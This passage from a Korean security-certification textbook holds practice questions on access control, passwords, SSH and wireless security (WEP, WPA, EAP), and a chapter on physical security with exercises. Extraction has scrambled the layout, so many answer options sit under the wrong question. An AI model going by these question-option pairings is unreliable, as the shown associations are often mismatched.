검색 4 추측하기 쉬운 패스워드 사용 금지 5 /etc/profile 파일 점검 70. 접근통제 정책과 관련이 없는 것은? 1 ISO/IEC ISO/IEC Identity-Based Policy 4 Rule-Based Policy 5 DoD' TCSEC 71. 윈도우 2000의 EFS(Encrypted File System)의 중대한 문제점에 대한 설명 중 틀린 것은? 1 EFS의 원리에서부터 시작 2 사용자들이 암호화 백업 파일을 지정하면 efs0.tmp 라는 파일이 생성 3 파일의 사본이 생기면 오리지널본은 삭제되고 다시 생성 4 새로운 파일이 암호화가 되면 임시파일은 보존된다. 5 사용자가 암호화할 때 사용하던 정보는 백업 파일인 efs0.tmp에 완벽한 평문의 형태로 디스크 표면에 존재. 1 chmod u+x file1 2 chmod g+r file2 3 chmod a+r *.pub 4 chmod u+g file3 5 chmod g+wx $HOME/SCCS 295
296 72. 윈도우 패스워드 보안에 관련된 내용 중 틀 린 것은? 1 윈도우 운영체제마다 틀리다. 2 윈도우 9x에서는 사용자별 계정정보가 c:\windows 디렉토리 안의.DLL등의 파일에 저장된다. 3 윈도우 NT/2000등에서는 윈도우 레지스트리 안의 SAM(Security Account Manager) 데이터 베이스에 저장되며, 일반 사용자의 접근이 불가 4 패스워드 해쉬를 구했을 때는 Dictionary attack, brute force attack 등의 패스워드 크래킹 공격이 가능 5 시스템에 따라서는 패스워드 해쉬를 다시 암호화하여 저장하기도 함 73. 다음 중 접근통제 기능 제품이 아닌 것은? 1 SCO CMW+ 2 AutoSecure 3 BoKS 4 SeOS 5 BaySecure Access Control 76. 직무-기반 정책은 현대의 상업용 환경에서 특히 가치가 있는 다른 형태의 정책이다. 아래는 경우는 은행의 경우에 사용자의 역할을 직무별로 출납계, 지점장, 고객, 시스템 관리자 및 감사 등으로 분류하고, 이들에 대한 접근통제 정책을 정의한 경우다. 틀린 것을 고르시오. 1 출납계는 예금을 처리하기 위하여 고객의 계정 기록을 수정하고, 출금은 지정된 금액 범위까지만 허용하며, 모든 계정기록에 대한 조회를 할 수 있도록 권한을 부여한다. 2 지점장은 예금 및 출금 거래를 하는 고객의 계정기록을 금액의 한도 없이 허용하고, 모든 계정기록의 조회와 계정의 개설 및 폐지를 할 수 있도록 권한을 부여한다. 3 고객은 자신의 계정에 관해서만 계정 조회를 할 수 있도록 권한을 부여한다. 4 시스템 관리자는 시스템의 운영과 시스템 기록에 대한 조회만을 할 수 있으며, 고객의 계정 정보는 읽거나 수정할 수 없도록 한다. 5 감사는 시스템에 있는 어느 데이터든지 읽을 수는 있고 수정할 수 있는 권한을 부여한다. 74. 파일 접근 허가에 관한 내용 중 틀린 것은? 1 파일의 SUID 속성은 rws 2 SUID는 프로그램 수행시 프로세스의 EUID가 프로그램 파일소유자의 GID로 설정 3 Sticky 비트는 유닉스의 성장으로 오늘날 거의 쓸모가 없다. 4 Sticky 비트는 가상 메모리에 로도된 프로그램 을 가상 메모리에 전속 5 파일의 SGID 속성은 rws 77. CBC(Context-Based Control)제어방법은 아래 와 같은 외부적인 요소에 의존하여 타겟의 접근 을 제어하는 정책에 이용될 수 있다. 아래의 외 부적인 요소 중 틀린 것을 고르시오. 1 사용자의 이름 2 하루의 특정시간 3 사용자의 현재 위치 4 개시자의 타겟 사이의 통신 경로 5 개시자의 신분을 확인하는데 사용된 인증수준 75. 객체 보안 등급의 2가지 주요특성을 포함하 고 있는 정보를 반영한 허용등급(classification level)과 객체 정보가 언급하는 응용분야의 범주 (category)로 구성 된다. 허용등급의 예가 아닌 것은? 1 0 = Unclassified 3 2 = Secret 5 4 = Strong secret 2 1 = Confidential 4 3 = Top secret 296
297 78. ACL(Access Control List)은 어떤 사용자들이 타겟에서 어떤 행위를 할 수 있는지 나타낸다. ACL의 기본적 특징이 아닌 것은? 1 이 메커니즘의 접근통제는 타겟-기반 ACI(Acess Control Control Information)로써 개시자 및 동작의 수식어 목록, 그리고 개시자-기반 ACI로서 개인, 그룹, 또는 직무 식별자 등의 정보를 이용하여 관리된다. 2 개시자 또는 개시자의 그룹이 소수일 때는 불편하다. 3 타겟 또는 타겟의 그룹에 접근을 할 때 편리 하다. 4 접근통제관리가 개시자를 기본으로 하는 것 보다 타겟 단위로 수행될 때 편리하다. 5 접근 권한의 취소가 쉽다. 79. CL(Capability List)는 일찍이 컴퓨터 접근통제 개념으로 소개되었다. CL의 기본적인 특징이 아 닌 것은? 81. 다음 중 일회용 패스워드(one time password) 기술에서 사용하는 방식이 아닌 것은? 1 RSA 공개키 암호화 방식 2 IDEA 암호화 방식 3 Time Sync. 방식 4 DES Challenge Response 방식 5 S/Key 방식 82. UNIX 파일 시스템에서 소유자는 쓰기, 읽기, 실행 권한을 주고 그룹 사용자는 읽기와 실행, 다른 사용자는 읽기만 가능하게 설정하려면 어떻 게 설정해야 하는가? 1 (rwx)(r-x)(r--) 2 (rwx)(-wx)(--x) 3 (r--)(rwx)(rw-) 4 (--x)(r-x)(rwx) 5 (r-x)(--x)(rwx) 83. 접근통제 메커니즘 중에 ACL(Access Control list) 의 특징이 아닌 것은? 1 접근통제는 어떤 타겟에 대하여 허용된 동작들의 집합을 정의하는 게시자-기반 ACI(capability)를 갖고 관리된다. 2 타겟의 수효가 적을 때 편리하다. 3 하나의 개시자가 접근할 수 있는 다수의 타겟 을 쉽게 찾을 수 있다. 4 주어진 객체를 접근할 수 있는 사용자들을 파악하는데 시간이 빨리 걸리고 효율적이다. 5 보안이 부분적으로 깨질 때 그 영향을 최소화 시킬 수 있다. 1 개시자 또는 개지자의 그룹이 소수일 때 편리 하다. 2 접근 권한의 취소가 쉽다. 3 보안이 부분적으로 깨질 때 그 영향을 최소화 시킬 수 있다. 4 타겟 또는 타겟의 그룹에 접근을 할 때 편리 하다. 5 접근 통제 관리자가 개시자에 접근 권한을 부여하거나 제거시키는 성질을 유지하기 쉽다. 80. 효과적인 패스워드 관리법으로 틀린 것은? 1 추측하기 쉬운 패스워드의 사용을 금지 시킨다. 2 최소 패스워드의 길이를 제한 한다. 3 쉐도우 패스워드 파일을 사용한다. 4 이미 사용했던 패스워드의 재사용을 금지 시킨다. 5 숫자만을 사용하여 패스워드를 구성하도록 한다. 84. 유닉스 시스템에서의 파일 설정 방법이 아닌 것은? 1 mount 테이블을 이용한 파일 시스템 관리 2 호스트에 대한 접근통제 내용의 설정 방법 3 네트워크 서비스에 대한 내용의 설정 방법 4 시스템 로그 파일의 기록을 위한 환경 설정 및 관리 기법 5 SAM을 통한 인증 서비스 수행 방법 297
298 85. 올바른 유닉스 시스템 보안관리 방법으로 틀 린 것은? 88. 역할기반 접근 통제(RBAC)의 배경이 되는 주 요 아이디어는 무엇인가? 1 항상 Root 사용자 쉘 상태를 유지한다. 2 외부에서 root로 접근 가능한 NFS 마운트가 이루어지지 않도록 막는다. 3 전자 우편 시스템의 sendmail은 지속적인 보안문제를 가지고 있으므로 최신 버전으로 교체 운영한다. 4 외부에서 접근 가능한 디렉토리의 접근 모드 를 항상 읽기 전용(Read Only)으로 조정한다. 5 수시로 init 프로세스 수정 여부와 /bin/login 파일 등 주요 시스템 실행 파일의 변경 유무 를 점검한다. 86. 최소 권한 정책(Minimum Privilege Policy)의 설명으로 맞지 않는 것은? 1 need-to-know 정책이라고도 부른다. 2 시스템 주체들은 그들의 활동을 위하여 필요 한 최소분량의 정보를 사용해야 한다. 3 객체 접근에 대하여 강력한 통제를 부여하는 효과가 있다. 4 데이터 공유의 장점을 증대시키기 위해 적용 하는 최대 가용성 원리에 기반 한다. 5 정당한 주체에게 소용없는 초과적 제한을 부가하는 단점이 있다. 87. 접근통제 메카니즘 중에 다수의 타겟을 다수 의 게시자들이 접근하고 있을 때 가장 편리한 방 법은 무엇인가? 1 통합 정보 메카니즘 2 SL(Security Label) 3 CL(Capability List) 4 CBC(Context-Based Control) 5 ACL(Access Control List) 1 해당 사용자가 수행하여야 할 역할에 따라 권한을 사용자에게 직접적으로 부여함 2 권한을 카테고리 별로 분류하여 해당 사용자 의 카테고리에 맞게 할당함 3 권한을 그룹단위로 부여하고, 그룹이 수행 하여야 할 역할에 따라 사용자를 그룹으로 분류함 4 권한을 사용자와 그룹에 동등하게 부여함. 89. 운영 체제 통제의 목표는 무엇인가? 1 비인가 된 컴퓨터 접근의 방지 2 관리의 단순화 3 네트워크 서비스의 보호 4 정보 시스템에 대한 접근 권한이 적절히 인 가, 할당 및 유지되는 지 여부를 보장 90. 모든 사용자가 유일한 사용자 ID를 필요로 할 때, 핵심 사항은 무엇인가? 1 계정 공유 여부를 검증하는 것 2 백엔드 인증 기술 여부를 확인하는 것 3 세션 타임아웃이 없음을 검증하는 것 4 사용자에게 접근 권한을 부여하기 전에 사용 자의 인증을 보장하는 것 91. 감사 추적 정보가 시스템 관리자에게 보호되 어야 하는 이유로 가장 합당한 것은? 1 시스템들이 감시되고 있다는 것을 아는 시스 템 관리자는 시스템의 불법적인 변경을 하기 전에 숙고하게 되므로 2 감사추적 로그 시스템에의 개별적 접근을 위해서는 시스템 관리자의 패스워드가 필요 하므로 3 시스템 관리자는 감사 추적 정보를 접근하여 언제 어떻게 시스템이 불법적으로 이용되었는 지를 검증할 수 있으므로 4 감사 추적 정보에 시스템 관리자에게 접근 하지 못하게 함으로써 감사추적 정보가 시스템 관리자가 불법행위에 대한 소송행위에 휘말리지 않도록 하므로 298
299 92. 접근 통제 보안 정책을 작성할 때, 조직의 기 본 입장은? x EAP(Extensible Authentication Protocol)의 설명으로 적합하지 않은 것은? 1 모든 접근 허용, 불필요한 접근 제한 2 모든 접근 거부, 원하는 접근 허용 3 모든 접근 거부, 필요한 접근 허용 4 모든 접근 허용, 원하지 않는 접근 제한 93. 사용자와 역할의 상호관계를 다루기 위한 계 정관리를 위해 어떤 개념이 적용되어야 하는가? 1 사용자 계정 2 최소 권한부여 원칙 3 특권 및 권한 4 계정 그룹 1 EAP-TLS는 인증서가 필요하다. 2 EAP-TLS는 동적인 키 생성 기능을 제공한다 3 EAP-TTLS는 중간자 공격(man-in-the-middle attack)에 강하다. 4 EAP-TTLS는 동적인 키 생성 기능을 제공한다. 5 PEAP 동적인 키 생성 기능을 제공한다. 99. 무선 인증은 다음 중 어떠한 기술을 기반으 로 하는가? 1 로그인 ID 2 IP 주소 3 개별 장비 4 장비의 활성 상태 94. 다음 중 어떠한 인증 기법이 PPTPV2를 사용 하도록 요구하는가? 100. 다음 중 무선 클라이언트를 인증하는 방법 중 하나는 무엇인가? 1 MS-CHAPv2 3 SPAP 2 MS-CHAP 4 PAP 1 IP 주소 3 MAC 주소 2 지리적인 위치 4 적외선 95. 다음 중 어떤 패스워드가 가장 안전한가? 1 secure 2 s3cur3 3 secure64 4 6wpitms4 96. SSH에서 어떤 설정 통제를 통하여 루트 사 용자에 대한 로그인 여부를 설정하는가? 1 PermitRootLogin 2 RootLogins 3 PermitRoot 4 AllowRoot 5 AllowRootLogins 101. 상위수준보안정책(HLSP)이 중요한 이유는 무엇인가? 1 모든 직원이 준수해야 할 바를 시사하므로 2 위험의 우선순위가 결정되므로 3 사업 목적에 대한 위험을 식별하고 제한 것이 중요하므로 4 위험 평가의 지침이 되므로 102. 다음 중 무선 클라이언트 장치가 도난 되었 을 때, 고려사항이 아닌 것은? x EAP(Extensible Authentication Protocol)의 설명으로 적합하지 않은 것은? 1 EAP-MD5는 공중 네트워크보다는 신뢰된 네트워크에 적합하다. 2 EAP-MD5에서는 서버 인증과정이 있다. 3 EAP-MD5에서는 동적인 키 생성이 되지 않는다. 4 LEAP은 시스코에 의해 제시된 EAP로서 서버 인증과정이 있다 5 LEAP은 사전(Dictionary) 공격에 약하다. 1 타인은 쉽게 인증 되지 않는다. 2 타인이 다른 타인을 인증할 수 있다. 3 도난된 장치에 정보는 평문으로 저장된다. 4 회사 기밀이 유출될 수 있다 다음 중 블루투스 장치 사이의 연결 확립에 이용되는 것은 무엇인가 1 키 2 토큰 3 칩 4 MAC 주소 299
300 104. 다음 중 WEP와 관련한 설명으로 틀 린 것은 무엇인가? 108. 다음은 계정 보안 방법에 관한 설명이다. 가 장 틀린 것은? 1 WEP는 Wired Equivalent Privacy의 약어이다. 2 패킷은 64 또는 128bit의 RC4 키로 암호화 된다. 3 초기벡터(IV)의 크기는 24bit이며 평문으로 전송된다 4 무결성확인값(ICV)은 RC4 키로 암호화된다. 5 64bit의 키 길이는 충분한 보안을 제공한다. 1 사용자 패스워드에 대한 암호화를 위해 MD5 를 사용한다. 2 SSL, PGP와 같은 암호화 프로토콜 사용한다. 3 시스템관리의 편의를 위해 계정과 패스워드를 일치시킨다. 4 시스템에서 기본적으로 사용하지 않는 계정은 삭제한다 다음 중 WEP의 문제점으로 적합한 것은? 109. 대상시스템을 스캐닝 할 때, 모의 침투자와 해커의 차이는 무엇인가? 1 키 관리에 취약점이 존재한다. 2 초기벡터사이즈 24bit는 16,777,216 개의 서로 다른 RC4 스트림을 생성하므로 충분한 크기이다. 3 무결성 확인값(ICV)은 CRC-32를 사용하므로 안전하다. 4 RC4를 적절히 사용하므로 안전하다 1 눈에 띄는 정도 2 권한 또는 허가 3 운영속도 4 자원 사용의 정도 110. 웹 세션을 추적하는 데 흔히 이용되는 방법 이 아닌 것은? 106. 다음 중 WEP의 가치로 적합하지 않은 것 은? 1 보안을 전혀 안 하는 것 보다는 WEP를 적용 하는 것이 낫다. 2 모든 벤더가 기본으로 제공한다. 3 VPN과 함께 사용할 수 있다. 4 무선 LAN 사용시, 충분한 보안을 제공한다. 1 URL 2 액티브 X 컨트롤 3 Hidden form elements 4 쿠키(Cookie) 107. 다음 중 WPA에 대한 설명으로 적합하지 않 은 것은? 1 WEP를 대체하는 기술이다. 2 WPA는 802.1x의 인증을 추가하였다. 3 WPA는 TKIP 암호화 기법을 추가하여 보다 강력한 WEP 보안 암호화를 실현하였다. 4 WPA는 WEP의 강력한 키 관리 기법을 그대로 수용하였다. 300
301 제 6장. 물리적 보안 및 환경 통제 제 1절. 물리적 보안 chapter 1. 물리적 보안 개요 chapter 2. 물리적 보안 위협 chapter 3. 기타 물리적 보안 방식 제 2절. 환경적 통제 방법 chapter 1. 환경 문제 chapter 2. 시설 관리 chapter 3. 관리 통제 chapter 4. 접근 통제 제 3절. 물리적 보안 및 환경 통제 문제 풀이 chapter 1. 종합 문제 301
302 제 1절. 물리적 보안 chapter1. 물리적 보안 개요 1970년대에는 컴퓨터를 사용하는 사람은 관련된 소수의 사람들만이 사용하였기 때문에 정보 자산에 대한 물리적 보안이 단순히 전산실로의 통제만으로 이루어졌다. 그러나 분산 네트워크 환경으로 변화 하면서 정보자산이 어디에서든 접근 가능하기 때문에, 요즘은 물리적 보안에 대한 부담과 중요성이 점 점 더 커지고 있다. 물리적 보안은 적절한 설비의 구축 및 화재 및 정전 등의 비상사태에 대한 방지, 절도 및 도난 방지, 출입 제한 등의 강력한 보안 절차를 통해 이루어진다. 가. 위험 요소 o 승인받지 않은 사람의 출입 o 장비/문서 등의 손상, 파괴 및 절취 o 중요한 정보의 공개 및 협박 o 장비 및 자원의 불법 횡령 chapter 2. 물리적 보안 위험 나. 물리적 보안 대책 o 각종 잠금장치o 방문자 기록 및 동행 o 직원의 신원 보증 및 신분증 배지(badge) o 경비원 및 감시카메라 o 방문자 접근의 통제 o 중요 구역의 이중 출입문 설치 o 민감한 시설의 위치 o 컴퓨터 단말기 잠금장치 o 단일 출입구 및 경보시스템 302
303 chapter 3. 기타 물리적 보안 방식 [표 6-1]은 물리적 보안 방식에 대한 간단한 설명이다. 303
304 제 2절. 환경적 통제 방법 chapter 1. 환경 문제 가. 환경적 위협 요소 천재지변, 화재, 테러 공격, 정전, 전기 합선 및 냉난방 고장 등 나. 환경 시설물 관리 적절하게 관리되지 않은 환경 시설물은 예기치 않은 현상을 초래하여 하드웨어 및 서비스 등에 잘못된 결과를 가져올 수 있다. 예를 들어 온도 및 습도가 적당하지 않아 컴퓨터 등의 자원이 손상되거나, 관 리자가 수도 및 가스 밸브의 위치를 몰라 자연 재해 시 제대로 대처하지 못하거나, 화재 탐지 및 진압 장치의 부재 및 미숙한 사용으로 인해 하드웨어 및 데이터 그리고 인명까지 위태로울 수 있는 결과를 초래 할 수 있다. 따라서 이러한 환경 시설물들은 모두 규칙적이고 적절하게 관리되어야 한다. o 환경 시설물- 습기 탐지기 및 휴대용 소화기 - 수동식 화재경보기 및 연기 탐지기 - 화재진압 시스템: 습식 파이프, 건식 파이프, 할론 소화기 등 - 내화성 자재 및 집기 - 과전압 보호기 및 무정전 전원창치(UPS) - 비상전원 차단 스위치 및 이중전원 공급 장치 등 chapter 2. 시설 관리 여기에서 시설이란 데이터, 장비 등을 수용하고 있는 건물을 말한다. 가. 시설 부지 선정 시 고려 사항 조직이 중요 정보 자산(자원)을 가진 시설을 지으려 할 때 될 수 있으면 남들의 이목에 띄지 않는 곳 에 지어, 잠재적인 공격자의 주목을 끌지 않도록 하는 등의 여러 가지 사항이 고려되어야 한다. 시설 부지 선정 시 가시성(Visibility), 이웃의 유형, 지역의 범죄율, 공공기관(경찰, 의료기관, 소방서 등)과의 인접성, 주위 환경의 가능한 위험, 도로 접근성, 교통량 및 교통시설(기차역, 공항 등)과의 인접성, 자연 재해의 발생 가능성 등을 모두 고려하여야 한다. 나. 건축 자재 및 구조물 선정 시 고려 사항 시설에서 보호하고 있는 자원의 종류에 따라서 시설 건설 시 요구되는 건축 자재 및 구조물 요구 사항 이 다르다. 예를 들어 중요 자산 보호를 위해 벽이나 문, 천장, 바닥은 화재를 예방할 수 있는 필수 자 재를 사용하며 가연성 자재를 사용해서는 안 된다거나, 하중과 무게 지탱 등급을 계량하여 그에 따라 시설을 지어야 한다는 등의 사항을 미리 고려해야 한다. 304
305 다. 설비 구성 시 고려 사항 (1) 구역 정의 조직에 따라 구역 등급을 정의할 수 있으며 예를 들어 다음과 같이 정의할 수 있다. o 구역 1: 일반인에게 개방된 지역 o 구역 2: 일반인에게는 개방되지 않고, 직원들에게 개방된 지역 o 구역 3: 보호되는 지역으로 신원 확인을 통해서만 접근 가능하고, 접근은 엄격히 통제된다. 외부인은 동행인 없이 접근할 수 없도록 한다. (2) 건물은 업무시간 중 접수 구역을 통한 접근을 위한 것 이외에는 항상 잠겨있어야 한다. (3) 공개된 지역에는 침입차단시스템을 통하지 않고는, 내부 네트워크에 접속되는 컴퓨터가 없어야 한다. (4) 서버실은 반드시 잠겨 있어야 하며, 가능하다면 전자 카드에 의한 접근을 이용한다. (5) 전자기적 파동으로부터의 시스템 보호를 고려한다. (6) 건물은 보안 인력에 의해 24시간 감시되어야 한다. (7) 서버실로의 접근은 기록해 두어야 한다(일지 및 비디오 녹화). (8) 전원 차단, 절도, 홍수, 폭발, 지진 등의 재해에 대비하기 위한 비상 계획이 있어야 한다. 데이터 센터 설비 구성 데이터 센터는 중요 전산 자산을 보호하므로 시공 전에 미리 보안이 고려되 어야 한다. 예를 들어 화재나 수해 등의 자연재해를 고려하여 최상층이나 지하에 위치하여서는 안 되 며, 일반 직원들에게는 격리되나, 비상사태 시 관련 직원들의 접근이 용이하도록 건물의 중앙에 위치하 도록 한다. (예: 3 ~ 6층). 장비실 설비 구성전선 배전 센터와 가까운 시설의 중심부에 위치해야 하며 보안이 철저히 유지해야 한다. 즉, 인가된 사람 외에는 출입이 불가능하도록 아예 격리된 곳에 장비실을 위치시켜야한다. chapter 3. 관리 통제 관리 통제(Administrative Controls)란 재난 발생 시 사람들이 적절하게 대응할 수 있다는 것을 보증하 기 위해 필요한 절차로써 비상 대피 절차나 시스템 종료 절차 등의 긴급 상황 시 절차 및 훈련, 모의 실험, 문서화, 검사 및 보고 등의 행위가 포함된다. 305
306 chapter 4. 접근 통제 가. 시설 접근 통제 물리적 보안과 관련하여 접근 통제는 시설, 컴퓨터, 사람 모두를 보호하며 인명에 대한 보호가 가장 우 선시된다. 물리적 접근 통제란 시설물, 지역 및 시스템에 들어오고자 하는 사람을 식별하여 허가된 사 람만 접근을 허용하고 비인가된 사람의 접근을 제한하는 것을 말한다. 시설 접근 통제를 위한 가장 쉬 우면서 보편적인 방법은 열쇠와 자물쇠이다. 즉 자물쇠에 해당하는 열쇠를 가진 사람만 제한 없이 시설에 접근, 이용할 수 있는 것으로 조직 내 이동될 수 있는 자원(노트북)의 도난을 방지하기 위해 도 난 방지 케이블을 설치하는 것이 그 예이다. 나. 인적 접근 통제 시설 및 지역에 접근을 하려는 사람이 실제 허가된 사람인지 식별하기 위해선 사용자 인증이 필수적이 다. 사용자 인증은 보안 요원에 의한 인식 및 열쇠 사용, 스마트카드 제시, 지문, 홍채 인식 등의 방법 을 통해 이루어진다. 피기백(Piggyback) : 다른 사람의 인가된 접근 권한을 이용하여 허가되지 않은 접근을 시도할 때 발 생하는 것으로 시설 출입 시 인가된 사람의 뒤에 바짝 붙여서 통과하는 것을 말한다. 306
307 제 6장. 물리적 보안 및 환경 통제 연습 문제 307
308 1. 보안을 위한 전산실의 운영은 침해사고 발생 이나 천재지변에 대비한 대응책을 마련한 후 운 영해야 함을 기본원칙으로 한다. 다음 중 직접적 인 대응 방법으로 옳지 않은 것은? 1 전산실 화재 방재 대책 및 천재지변으로부터 의 보호 대책을 마련한다. 2 화재의 발생 시 시스템 피해가 없도록 이산화 탄소를 이용한 화재 방재 시스템과 같은 장비 를 구축해야 한다. 3 전산실 관리 책임을 본사로 이관한다. 4 전산실 출입문에 보안을 강화하여 물리적 보안을 강화한다. 5. 다음 인터넷 환경 보안 위협 중 소극적인 (Passive) 공격에 해당하는 것은? 1 데이터 파괴 2 메시지 변조 3 서비스 거부 공격 4 시스템 분석 6. 다음 중 물리적 노출의 위협과 관련성이 가장 먼 것은? 1 승인 받지 않은 사람의 불법 접근 2 장비 또는 문서 등의 손상 파괴 및 절취 3 천재지변 및 화재 4 장비 또는 자원의 횡령 2. 물리적 보안에서 말하는 방어의 최후에 위치 하는 것으로 맞는 것은? 1 시스템 2 내부 장벽 3 사람 4 보안 소프트웨어 3. 다음 설명 중 피기백(Piggyback)에 대해 바르 게 설명한 것은 무엇인가? 1 승인된 사람을 뒤따라 물리적이나 논리적으로 컴퓨터의 내부 네트워크에 접근 2 통신 회선을 통해 전송되는 정보를 도청 3 시스템의 정상적인 동작을 방해하여 사용자에 대한 서비스의 제공을 거부 4 불법 사용자가 자신의 호스트 IP 주소를 허락 된 사용자 IP 주소로 위장 4. 물리적 보안에 대한 설명 중 옳지 않은 것은? 1 물리적인 보안은 외부의 침입자보다는 내부 적인 침입자로부터 보호하는 것에 주목적이 있다. 2 물리적인 보안은 정전, 화재 등으로 인한 고장 등을 포함한 시스템 안전에 관한 모든 보호를 포함한다. 3 물리적 보안은 네트워크 보안이 허술할 때 생길 수 있는 피해보다 항상 크므로 물리적 보안이 중요하다. 4 물리적 보안은 재산과 직결되어 있는 재산 보호 측면에서도 중요하며, 네트워크 서비스 하기 위한 1차 요소이다. 7. 조직의 기밀정보가 보관되고 처리되는 정보시 스템실의 안전한 보호를 위한 조치중 적절하지 않은 것은? 1 정보시스템실의 물리적 보안 통제를 위하여 지문인식장치를 도입한다. 2 일반인의 통제를 위하여 정보시스템실을 4층에 위치시키며 이 구역은 통제구역임을 표시하여 접근을 통제한다. 3 경비절감을 위하여 4층의 경비원을 철수하고 CCTV를 추가로 배치하여 상시 모니터링 한다. 4 보안을 강화하기 위하여 Warm site 형태로 물리적 통제와 환경적 통제 장치가 구성된 백업센터를 구축한다. 8. 다음 중 물리적 보안위험 또는 노출 위협이 아닌 것은? 1 지진 및 자연 재해 2 피기백 또는 테일케이팅 3 서비스 거부 공격 4 전원 공급의 중단 9. 다음 중 물리적 보안 위협으로부터 보호해야 할 자원으로 거리가 가장 먼 것은? 1 정보의 암호화 통제 2 운영자의 콘솔 3 문서 폐기 또는 소각장소 4 일반 사무실의 직원 PC 308
309 10. 다음 사람들 중 물리적 노출 위협을 유발할 가능성이 가장 높은 사용자는 누구인가? 14. 물리적 보안통제 대책을 설계할 때 가장 먼 저 고려해야 하는 것은 무엇인가? 1 산업스파이 2 불만을 가진 직원 3 징계되거나 해고된 직원 4 보안을 인식하고 있지 않은 내부 직원 11. 다음의 물리적 보안 중 가장 강력한 접근 통 제는 어느 것인가? 1 안정적인 전원공급을 보장하기 위한 무정전 전원장치(UPS)의 도입 2 비인가자의 불법접근을 차단할 수 있는 전략적 위치 3 물리적 접근을 통제하기 위한 통제구역, 제한 구역, 공개구역의 구분 4 정보시스템 운영자를 포함한 생명안전 1 열쇠와 자물쇠 2 RF Card 키와 자동문 3 지문인식기 4 번호조합키 12. 다음 중 물리적 보안통제와 관련된 내용이다. 내용 중 옳지 않은 것은? 1 물리적 접근 통제의 목적은 승인되지 않은 비인가자의 불법 접근으로부터 조직의 자산을 보호하는 것이다. 2 기밀정보나 시설에 대한 접근은 승인을 받은 사용자로 제한되어야 한다. 3 물리적 접근 통제는 논리적 또는 기술적 접근 통제와 결합되어 보안을 강화시킨다. 4 더욱 안전한 물리적 보안통제를 위해서는 사무 공간, 전산실, 접견실 등에 대하여 강도 높은 물리적 통제를 일관적으로 적용하여야 한다. 13. 다음 중 승인된 사용자의 뒤를 따라 승인 받 지 않은 사람이 출입할 수 있는 피기백을 예방할 수 있는 물리적 통제 대책은? 15. 정보보호의 관점에서 볼 때 정보시스템실 또 는 전산실의 전략적 위치는? 1 홍수나 침수의 피해를 예방하기 위하여 높은 층에 위치할수록 좋다 2 고층 건물의 경우 3, 4, 5,6층 정도에 위치 하는 것이 좋다 3 일반 사용자의 출입이 금지될 수 있는 최하위 의 지하층이 좋다. 4 지진대나 상습 침수지역 또는 외부에 잘 드러 나는 곳은 피하는 것이 좋다 16. 다음 설명 중 물리적인 보안구역 설정의 목 적으로 적합하지 않은 것은 무엇인가? 1 정보처리설비 운영의 방해로부터 보호하기 위함이다. 2 업무의 제반시설과 정보에 대한 손상을 보호 하기 위함이다. 3 정보처리 책임을 다른 조직에 외주 주었을 경우 정보보호를 유지하기 위함이다. 4 비인가자의 무단접근을 방지하기 위함이다. 1 기계식 잠금장치(Bolting Door Lock) 2 지문인식 장치(Fingerprint Scanner) 3 이중 출입문 4 전자식 잠금장치(Electronic Door Lock) 309
310 17. 물리적인 보안구역의 설정에서 통제구역에 대한 설명 중 적합하지 않는 것은 무엇인가? 20. 보안구역의 선택과 설계에 있어 고려사항으 로 적합하지 않은 것은 무엇인가? 1 물리적인 보호는 업무의 제반시설 주변에 물리적인 장벽을 설치함으로 수행될 수 있다. 2 정보처리설비 지역을 보호하기 위하여 보안 구역을 설정해야 한다. 3 장벽의 강도는 위험평가의 결과에 따라 결정 된다. 4 보안사고와 기능장애의 유형, 규모, 비용을 정량화하고 감시할 수 있는 메커니즘이 존재 해야 한다. 18. 물리적인 통제구역의 설정과 출입을 제한하 기 위하여 고려 사항으로 적합하지 않은 것은 무 엇인가? 1 건물이나 보안구역의 정보처리설비를 효과적 으로 보수 유지할 수 있도록 요원들의 요구 사항에 맞게 개방해야 한다. 2 정보처리설비를 보유한 건물이나 장소 주변은 물리적으로 안전해야 한다. 3 건물이나 보안구역에 유인 안내데스크나 다른 물리적인 접근을 통제할 수 있는 수단이 적소 에 위치해야 한다. 4 보안구역의 모든 화재비상구에는 경보장치를 설치해야하고, 즉시 차단될 수 있도록 설계 해야 한다. 19. 보안구역에 대한 물리적인 출입을 통제하기 위하여 필요한 고려사항으로 적합하지 않은 것은 무엇인가? 1 보안구역 방문자는 감독을 받아야 하며, 출입 일시를 기록해야 한다. 2 방문자들은 인가된 특정 목적으로만 출입이 가능하다. 3 중요 정보와 정보처리설비에 대한 접근은 외 부자로 제한한다. 4 보안구역의 접근권한은 정기적으로 검토하고 갱신해야 한다. 1 핵심 설비들은 대중들의 접근을 회피할 수 있는 장소에 위치해야 한다. 2 보안이 필요한 건물은 건물 내외부에 정보 처리설비가 있다는 뚜렷한 표시를 나타내어야 하고, 눈에 잘 띄는 곳에 최대한 표시해야 한다. 3 정보자산에 영향을 미칠 수 있는 접근을 방지 하기 위하여 복사기, 팩스와 같은 지원기능과 장비를 보안구역 내에 설치해야 한다. 4 조직이 관리하는 정보처리설비들은 제3자가 관리하는 설비들과 분리해야 한다. 21. 보안구역에서의 작업에 있어 적절하지 않은 것은 무엇인가? 1 직원들은 보안구역의 존재와 그 구역 내에서 의 활동에서 필요한 인원에게만 정보를 제공 해야 한다. 2 인가되지 않은 사진기, 비디오, 오디오 또는 기타 레코딩 장비의 휴대를 허용하지 말아야 한다. 3 제3자의 지원서비스 요원들은 보안구역 또는 기밀 정보처리설비에 접근이 필요한 경우 자유롭게 접근 가능해야 한다. 4 안전과 유해한 활동을 방지하기 위하여 보안 구역 내에서는 감독 없이 작업하는 일이 없어야 한다. 22. 물리적 보안에서의 출입관리 설비로 적절하 지 못한 것은 무엇인가? 1 IC 카드 2 카드 센스 장치 3 지문 조합 장치 4 콘딧(Conduit) 310
